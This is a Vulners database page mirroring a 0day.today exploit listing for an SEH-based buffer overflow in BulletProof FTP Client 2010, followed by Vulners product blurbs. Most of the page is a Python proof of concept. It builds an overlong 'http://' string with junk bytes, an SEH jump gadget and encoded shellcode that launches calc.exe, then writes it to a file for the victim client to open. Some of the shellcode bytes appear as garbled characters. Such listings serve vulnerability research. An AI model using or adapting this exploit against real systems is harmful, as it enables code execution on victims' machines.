Lucene search
K

BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit

🗓️ 19 Aug 2014 00:00:00Reported by metacomType 
zdt
 zdt
🔗 0day.today👁 15 Views

BulletProof FTP Client 2010 Buffer Overflow (SEH) Exploit tested on Windows XP SP3 E

Code
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)
#!/usr/bin/python
# coding: utf-8
# Tested on: Windows XP SP3 EN
# Version: 2010.75.0.76
# Date: 19.08.2014 
# Author: metacom

# Download link: http://www.bpftp.com/ 
# Open the -ENTER URL- in filename via File -> Open Flash URL\n";


head="http://"
junk ="\x41" * 89

# 1.\xeb\x06\x90\x90" 
# 2.74C9DE3E   5F POP EDI oleacc.dll
# jump + pop + ShellCode calc.exe Encryption

junk+=("됐>ÞÉt1ÉQhcalcT¸Ç“ÂwÿÐ")

exploit=head + junk 
try:
    out_file = open("exploit.txt",'w')
    out_file.write(exploit)
    out_file.close()
except:
    print "Error"

#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2014 00:00Current
7.5High risk
Vulners AI Score7.5
15